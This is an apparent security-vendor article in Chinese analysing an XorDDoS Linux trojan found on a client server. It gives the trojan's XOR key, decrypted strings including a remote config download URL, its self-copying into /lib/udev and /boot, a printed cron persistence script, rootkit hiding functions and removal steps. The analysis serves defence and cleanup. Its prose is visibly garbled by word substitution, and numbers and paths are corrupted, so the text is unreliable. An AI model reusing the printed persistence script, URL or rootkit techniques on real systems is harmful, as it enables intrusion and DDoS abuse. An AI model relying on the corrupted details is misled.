|
|
|
联系客服020-83701501

抓住Linux木马的小尾巴并且清除它

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
抓住Linux木马的小尾巴而且断根它

Linux木马愈来愈常见,而Linux零碎屡屡运行侧告急的营业,以是一旦被植入木马,对营业的影响会很大。不久前,某 客户被安然机构检测出流量极端,客户寻找了许久都不有缔造题目出在什么处所,没门径的环境找到我们追求扶直。该木马也简直极度麻烦,无论你怎样删除它一会 又会呈现。其实预先在客户追求我们扶直的时候已经缔造了被感化的机械是那台。只是迫于自身无奈删除以是不有对我们坦诚而已。态度就是一问3不知啊!没辙只 好自身开始想门径想门径。

过程介绍

这么多台设备总不克不及一台台上机检测吧!那我会疯的。逼于无奈只好,架设上设备’铁穹’在网络出口处对流量休止剖析,还是这玩意管用啊。很快的就缔造了一台主机对外流量发送极端。原来以为缔培育莳植提拔好办了删除就是了撒!(功亏一篑回家洗白白)但是现实老是会让你恶心后才罢手。

很 快的找到了木马地址的文件删除掉。重启共计机检测流量。尼玛什么环境还在对外发包,逼于无奈的环境下只好独霸铁穹对流量强大的复原遵从,将流量复原休止详 细剖析,看可否是发的异样报文。哎一看既然还是异样的报文。再次上到办事器,无语啊!进程又在了。没辙只好把木马拿出来休止剖析。

操纵设备

全体断根木马过程中所操纵的的硬件设备是铁穹高级持续性利诱预警零碎和ida、gdb、edb、等剖析软件,皮相如下:

该木马运行之后会向长途IP的一9一50端口发送SYN报文,平均每秒发送3万多条数据包,是模范的SYN FLOOD攻打。剖析后缔造感化的木马是会被动带动DDos攻打,属于XorDDos家眷。

木马举止剖析

文件扫描信息

4a471422846246

文件逆向剖析【次要举止】

一) 解密字符串

木马颠末解密钥匙:二2一;BB二FA36AAA954一F0二43;,对字符串休止XOR解密,解密出的字符串蕴含:

Default
一二3456七89一0一1 /boot/ /var/run/sftp.pid /lib/udev/udev /lib/udev/ http://info.3000uc.com/config.rar /var/run/

解密出如下零碎号令:

Default
一二3456七89一0一1一二一3一4一5一6一七一8一9二0二一二2二3二4二5二6二七二8二9303一3二333435363七3839404一4二43 cat resolv.conf sh bash su ps -ef ls top netstat -an netstat -antop grep "A" sleep 一 cd /etc echo "find" ifconfig eth0 ifconfig route -n gnome-terminal id who whoami pwd uptime

这次字符串在后续的垄断中,会被用于文件拷贝和零碎号令的履行。

一) 拷贝文件

在断根过程中可说是9曲十3弯,木马的自我爱护机制做的极度到位。拥有自复制、重定名等恶心遵从。

木马会将原始文件拷贝两份到不同的目次下,fb5c1422846314

将文件拷贝到/lib/udev/目次下,并将文件名装作成udev。

10fb1422846345

将文件拷贝到/boot/目次下,定名随机。

二) 运行子进程并删除原始文件

木马颠末fork函数将父进程结束,并删除父进程的文件,同时运行boot下的木马挨次,持续休止零碎感化。

3) 构建打点工作

木马颠末构建工夫打点工作来实现发起,并每3分钟检测挨次可否运行,假如不具有,会持续颠末拷贝本来运行。

枢纽脚本文件

/etc/crontab,内容如下

Default
一二345 # m h dom mon dow user command # */3 * * * * root /etc/cron.hourly/cron.sh

/etc/cron.hourly/cron.sh,内容如下

Default
一二3456七89 #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X一1R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $一'}`; do ifconfig $i up& done cp /lib/udev/udev /lib/udev/debug /lib/udev/debug

4) 休止网络通信

木马会起多线程休止网络垄断,独霸下载文件、更新文件、休止DDos攻打等。XorDdos木马来自中国,攻打的工具也异样来自中国。

09dd1422846431

5) 此外遵从

从消息剖析来看,木马还具有rootkit的遵从,首先它会颠末CheckLKM函数决定可否休止rootkit感化,前提是能打开 /proc /rs_dev,遵从蕴含:hide_file, hide_proc, hide_tcp4_ports, hide_tcp6_ports, hide_udp4_ports, hide_udp6_ports; firewall_acceptip, firewall_dropip。

同时具有绕过iptables的遵从。

82661422846474

木马断根

找到 /lib/udev/udev /etc/cron.hourly/cron.sh 以及 /boot下的文件,并删除,尔后重启。

【via@南京东巽】

数安新闻+更多

证书相关+更多